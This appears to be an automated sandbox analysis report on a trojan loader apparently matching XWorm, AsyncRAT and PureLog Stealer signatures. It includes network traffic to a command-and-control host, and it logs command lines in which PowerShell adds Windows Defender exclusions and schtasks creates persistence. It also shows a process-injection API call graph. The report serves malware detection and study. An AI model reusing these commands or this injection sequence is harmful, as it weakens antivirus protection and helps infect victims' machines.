                      Jul 18, 2024 16:31:41.071825981 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:41.071928978 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:41.072434902 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:41.078141928 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:41.618186951 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:41.624803066 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:42.067006111 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:42.068069935 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:42.068248034 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:42.068526983 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:42.073923111 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:50.836555004 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:50.841979027 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:51.064928055 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:51.067688942 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:51.072901964 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:04.204452991 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:04.261724949 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:04.570806980 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:04.575828075 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:04.783942938 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:04.785702944 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:04.790569067 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:06.994038105 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:06.999061108 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.008755922 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.014265060 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.102291107 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.108501911 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.204334021 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.206417084 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.211281061 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.332920074 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.334605932 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.339598894 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.451644897 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:07.453531027 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:07.458456993 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:15.540010929 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:15.545300961 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:16.033703089 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:16.036921024 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:16.037200928 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:16.039118052 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:16.044476986 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.445759058 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:17.478152990 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.478214025 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:17.488514900 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.672245979 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.674007893 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:17.678848028 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.876040936 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:17.877995968 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:17.882847071 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:23.992654085 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:24.013540983 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:24.237898111 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:24.240509987 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:24.245366096 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:28.852276087 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:28.857325077 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:29.089566946 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:29.091684103 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:29.096566916 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:34.193804979 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:34.243185043 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:42.589699030 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:42.595805883 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:42.894130945 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:42.896224022 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:42.901123047 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.321254969 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:56.326977015 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.492829084 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:56.616192102 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.624037981 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.624092102 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:56.629151106 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.830532074 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:32:56.832349062 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:32:56.839005947 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:04.227003098 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:04.232907057 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:04.535226107 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:04.539840937 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:04.544970036 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:09.713680029 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:09.718672037 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:09.947715998 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:09.953691006 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:09.958503008 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:12.414556026 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:12.419718027 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:12.636915922 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:33:12.637856960 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:33:12.643827915 CEST3060849717193.161.193.99192.168.2.6

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 18, 2024 16:29:13.448894024 CEST5096953192.168.2.61.1.1.1
                      Jul 18, 2024 16:29:13.481210947 CEST53509691.1.1.1192.168.2.6
                      Jul 18, 2024 16:29:48.048352003 CEST5362695162.159.36.2192.168.2.6
                      Jul 18, 2024 16:29:48.539948940 CEST53592891.1.1.1192.168.2.6

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 18, 2024 16:29:13.448894024 CEST192.168.2.61.1.1.10xc826Standard query (0)moneymaker-30608.portmap.hostA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 18, 2024 16:29:13.481210947 CEST1.1.1.1192.168.2.60xc826No error (0)moneymaker-30608.portmap.host193.161.193.99A (IP address)IN (0x0001)false

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:10:29:02
                      Start date:18/07/2024
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                      Imagebase:0x1c0000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:3
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                      Imagebase:0x160000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                      Imagebase:0x160000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"
                      Imagebase:0x850000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:10:29:06
                      Start date:18/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:10:29:07
                      Start date:18/07/2024
                      Path:C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe"
                      Imagebase:0xbc0000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:10
                      Start time:10:29:08
                      Start date:18/07/2024
                      Path:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      Imagebase:0x820000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 32%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:11
                      Start time:10:29:09
                      Start date:18/07/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff717f30000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:12
                      Start time:10:29:13
                      Start date:18/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp"
                      Imagebase:0x850000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:10:29:13
                      Start date:18/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:14
                      Start time:10:29:13
                      Start date:18/07/2024
                      Path:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                      Imagebase:0x280000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:15
                      Start time:10:29:13
                      Start date:18/07/2024
                      Path:C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe"
                      Imagebase:0xc10000
                      File size:641'536 bytes
                      MD5 hash:DC674885E842E9C05644CE23F5D8B665
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:11.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:281
                        Total number of Limit Nodes:17
                        execution_graph 47333 56a7f88 47334 56a7fbf 47333->47334 47335 56a7a48 2 API calls 47334->47335 47336 56a7fc4 47334->47336 47335->47334 47019 56a8169 47020 56a8173 47019->47020 47023 56a7a48 47020->47023 47022 56a81b8 47024 56a7a53 47023->47024 47025 56ab343 47024->47025 47028 ad749c 47024->47028 47033 ad8d69 47024->47033 47025->47022 47030 ad74a7 47028->47030 47029 ad9069 47029->47025 47030->47029 47038 add3a8 47030->47038 47043 add3b8 47030->47043 47035 ad8d78 47033->47035 47034 ad9069 47034->47025 47035->47034 47036 add3a8 2 API calls 47035->47036 47037 add3b8 2 API calls 47035->47037 47036->47034 47037->47034 47040 add3d9 47038->47040 47039 add3fd 47039->47029 47040->47039 47048 add568 47040->47048 47052 add558 47040->47052 47044 add3d9 47043->47044 47045 add3fd 47044->47045 47046 add568 2 API calls 47044->47046 47047 add558 2 API calls 47044->47047 47045->47029 47046->47045 47047->47045 47049 add575 47048->47049 47050 add5af 47049->47050 47056 adc130 47049->47056 47050->47039 47053 add575 47052->47053 47054 add5af 47053->47054 47055 adc130 2 API calls 47053->47055 47054->47039 47055->47054 47057 adc13b 47056->47057 47058 ade2c8 47057->47058 47060 add754 47057->47060 47061 add75f 47060->47061 47062 ad749c 2 API calls 47061->47062 47063 ade337 47062->47063 47067 56a01a0 47063->47067 47072 56a01b8 47063->47072 47064 ade371 47064->47058 47068 56a01b8 47067->47068 47069 56a01f5 47068->47069 47077 56a0fff 47068->47077 47082 56a1010 47068->47082 47069->47064 47073 56a01f5 47072->47073 47074 56a01e9 47072->47074 47073->47064 47074->47073 47075 56a0fff 2 API calls 47074->47075 47076 56a1010 2 API calls 47074->47076 47075->47073 47076->47073 47078 56a103b 47077->47078 47079 56a10ea 47078->47079 47087 56a1ee0 47078->47087 47091 56a1ed0 47078->47091 47083 56a103b 47082->47083 47084 56a10ea 47083->47084 47085 56a1ee0 2 API calls 47083->47085 47086 56a1ed0 2 API calls 47083->47086 47085->47084 47086->47084 47095 56a1f30 47087->47095 47099 56a1f24 47087->47099 47092 56a1f15 47091->47092 47093 56a1f30 CreateWindowExW 47091->47093 47094 56a1f24 CreateWindowExW 47091->47094 47092->47079 47093->47092 47094->47092 47096 56a1f98 CreateWindowExW 47095->47096 47098 56a2054 47096->47098 47100 56a1f98 CreateWindowExW 47099->47100 47102 56a2054 47100->47102 47152 71d69d9 47153 71d68f4 47152->47153 47157 71d8e90 47153->47157 47172 71d8e82 47153->47172 47154 71d6806 47158 71d8eaa 47157->47158 47188 71d9466 47158->47188 47193 71d94d6 47158->47193 47198 71d9957 47158->47198 47202 71d9317 47158->47202 47207 71d9565 47158->47207 47213 71d972a 47158->47213 47220 71d92ea 47158->47220 47225 71d925a 47158->47225 47233 71d99cc 47158->47233 47243 71d9a12 47158->47243 47248 71d9392 47158->47248 47252 71d9350 47158->47252 47159 71d8eb2 47159->47154 47173 71d8e5a 47172->47173 47174 71d8e8a 47172->47174 47173->47154 47176 71d99cc 4 API calls 47174->47176 47177 71d925a 4 API calls 47174->47177 47178 71d92ea 2 API calls 47174->47178 47179 71d972a 2 API calls 47174->47179 47180 71d9565 2 API calls 47174->47180 47181 71d9317 2 API calls 47174->47181 47182 71d9957 2 API calls 47174->47182 47183 71d94d6 2 API calls 47174->47183 47184 71d9466 2 API calls 47174->47184 47185 71d9350 2 API calls 47174->47185 47186 71d9392 2 API calls 47174->47186 47187 71d9a12 2 API calls 47174->47187 47175 71d8eb2 47175->47154 47176->47175 47177->47175 47178->47175 47179->47175 47180->47175 47181->47175 47182->47175 47183->47175 47184->47175 47185->47175 47186->47175 47187->47175 47189 71d9b40 47188->47189 47256 71d5df9 47189->47256 47261 71d5e00 47189->47261 47190 71d9b5b 47194 71d94ee 47193->47194 47265 71d5f98 47194->47265 47269 71d5f90 47194->47269 47195 71d950f 47195->47159 47200 71d5f98 WriteProcessMemory 47198->47200 47201 71d5f90 WriteProcessMemory 47198->47201 47199 71d9985 47200->47199 47201->47199 47203 71d92f6 47202->47203 47203->47202 47204 71d9308 47203->47204 47205 71d5f98 WriteProcessMemory 47203->47205 47206 71d5f90 WriteProcessMemory 47203->47206 47204->47159 47205->47203 47206->47203 47208 71d94ee 47207->47208 47209 71d9c50 47208->47209 47211 71d5f98 WriteProcessMemory 47208->47211 47212 71d5f90 WriteProcessMemory 47208->47212 47210 71d950f 47210->47159 47211->47210 47212->47210 47214 71d9844 47213->47214 47273 71d9eff 47214->47273 47279 71d9f52 47214->47279 47285 71d9ec0 47214->47285 47296 71d9f10 47214->47296 47215 71d9860 47222 71d92f6 47220->47222 47221 71d9308 47221->47159 47222->47221 47223 71d5f98 WriteProcessMemory 47222->47223 47224 71d5f90 WriteProcessMemory 47222->47224 47223->47222 47224->47222 47226 71d9298 47225->47226 47309 71d6214 47226->47309 47313 71d6220 47226->47313 47234 71d9a29 47233->47234 47235 71d99d5 47233->47235 47317 71d5918 47234->47317 47321 71d5910 47234->47321 47235->47234 47238 71d92f6 47235->47238 47236 71d9a3e 47237 71d9308 47237->47159 47238->47237 47239 71d5f98 WriteProcessMemory 47238->47239 47240 71d5f90 WriteProcessMemory 47238->47240 47239->47238 47240->47238 47244 71d9a18 47243->47244 47246 71d5918 ResumeThread 47244->47246 47247 71d5910 ResumeThread 47244->47247 47245 71d9a3e 47246->47245 47247->47245 47250 71d5df9 Wow64SetThreadContext 47248->47250 47251 71d5e00 Wow64SetThreadContext 47248->47251 47249 71d93ac 47250->47249 47251->47249 47325 71d6088 47252->47325 47329 71d6080 47252->47329 47253 71d9372 47253->47159 47257 71d5dfe Wow64SetThreadContext 47256->47257 47258 71d5dd4 47256->47258 47260 71d5e8d 47257->47260 47258->47190 47260->47190 47262 71d5e45 Wow64SetThreadContext 47261->47262 47264 71d5e8d 47262->47264 47264->47190 47266 71d5fe0 WriteProcessMemory 47265->47266 47268 71d6037 47266->47268 47268->47195 47270 71d5f98 WriteProcessMemory 47269->47270 47272 71d6037 47270->47272 47272->47195 47274 71d9ee6 47273->47274 47275 71d9f0a 47273->47275 47274->47215 47301 71d5ed8 47275->47301 47305 71d5ed1 47275->47305 47276 71d9f44 47276->47215 47280 71d9f36 47279->47280 47282 71d9f5a 47279->47282 47283 71d5ed8 VirtualAllocEx 47280->47283 47284 71d5ed1 VirtualAllocEx 47280->47284 47281 71d9f44 47281->47215 47282->47215 47283->47281 47284->47281 47286 71d9f1e 47285->47286 47291 71d9ece 47285->47291 47287 71d9f40 47286->47287 47288 71d9f30 47286->47288 47292 71d5ed8 VirtualAllocEx 47287->47292 47293 71d5ed1 VirtualAllocEx 47287->47293 47294 71d5ed8 VirtualAllocEx 47288->47294 47295 71d5ed1 VirtualAllocEx 47288->47295 47289 71d9f43 47289->47215 47290 71d9f44 47290->47215 47291->47215 47292->47289 47293->47289 47294->47290 47295->47290 47297 71d9f25 47296->47297 47299 71d5ed8 VirtualAllocEx 47297->47299 47300 71d5ed1 VirtualAllocEx 47297->47300 47298 71d9f44 47298->47215 47299->47298 47300->47298 47302 71d5f18 VirtualAllocEx 47301->47302 47304 71d5f55 47302->47304 47304->47276 47306 71d5ed8 VirtualAllocEx 47305->47306 47308 71d5f55 47306->47308 47308->47276 47310 71d6220 CreateProcessA 47309->47310 47312 71d646b 47310->47312 47314 71d62a9 CreateProcessA 47313->47314 47316 71d646b 47314->47316 47318 71d5958 ResumeThread 47317->47318 47320 71d5989 47318->47320 47320->47236 47322 71d5918 ResumeThread 47321->47322 47324 71d5989 47322->47324 47324->47236 47326 71d60d3 ReadProcessMemory 47325->47326 47328 71d6117 47326->47328 47328->47253 47330 71d6088 ReadProcessMemory 47329->47330 47332 71d6117 47330->47332 47332->47253 47107 adda88 47108 addace 47107->47108 47111 addc68 47108->47111 47114 add6f4 47111->47114 47115 addcd0 DuplicateHandle 47114->47115 47116 addbbb 47115->47116 47117 71da028 47118 71da1e8 47117->47118 47121 71da04e 47117->47121 47119 71da1b3 47119->47119 47121->47119 47122 71d71ac 47121->47122 47123 71da2a8 PostMessageW 47122->47123 47124 71da314 47123->47124 47124->47121 47337 ad4948 47338 ad4951 47337->47338 47339 ad4957 47338->47339 47343 ad4a43 47338->47343 47348 ad4104 47339->47348 47341 ad4972 47344 ad4a65 47343->47344 47352 ad4f58 47344->47352 47356 ad4f4b 47344->47356 47349 ad410f 47348->47349 47364 ad7260 47349->47364 47351 ad76aa 47351->47341 47354 ad4f7f 47352->47354 47353 ad505c 47353->47353 47354->47353 47360 ad4bb4 47354->47360 47357 ad4ef3 47356->47357 47358 ad4f4f 47356->47358 47357->47357 47358->47357 47359 ad4bb4 CreateActCtxA 47358->47359 47359->47357 47361 ad5fe8 CreateActCtxA 47360->47361 47363 ad60ab 47361->47363 47365 ad726b 47364->47365 47368 ad743c 47365->47368 47367 ad7b55 47367->47351 47369 ad7447 47368->47369 47372 ad746c 47369->47372 47371 ad7c3a 47371->47367 47373 ad7477 47372->47373 47374 ad749c 2 API calls 47373->47374 47375 ad7d2d 47374->47375 47375->47371 47376 56e3118 47379 56e2238 47376->47379 47378 56e3137 47380 56e2243 47379->47380 47382 ad749c 2 API calls 47380->47382 47383 ad8d69 2 API calls 47380->47383 47381 56e31bc 47381->47378 47382->47381 47383->47381 47384 56e6798 47385 56e67e6 DrawTextExW 47384->47385 47387 56e683e 47385->47387 47103 56a4670 47104 56a46b2 47103->47104 47106 56a46b9 47103->47106 47105 56a470a CallWindowProcW 47104->47105 47104->47106 47105->47106 47125 56ac1d0 47126 56ac1f2 47125->47126 47127 ad749c 2 API calls 47125->47127 47128 ad8d69 2 API calls 47125->47128 47127->47126 47128->47126 47129 adb310 47130 adb31f 47129->47130 47132 adb3f8 47129->47132 47133 adb419 47132->47133 47134 adb43c 47132->47134 47133->47134 47140 adb6a0 47133->47140 47144 adb690 47133->47144 47134->47130 47135 adb434 47135->47134 47136 adb640 GetModuleHandleW 47135->47136 47137 adb66d 47136->47137 47137->47130 47141 adb6b4 47140->47141 47143 adb6d9 47141->47143 47148 ada790 47141->47148 47143->47135 47145 adb695 47144->47145 47146 adb6d9 47145->47146 47147 ada790 LoadLibraryExW 47145->47147 47146->47135 47147->47146 47149 adb860 LoadLibraryExW 47148->47149 47151 adb8d9 47149->47151 47151->47143

                        Executed Functions

                        Function 07083B70 Relevance: .7, Instructions: 739COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
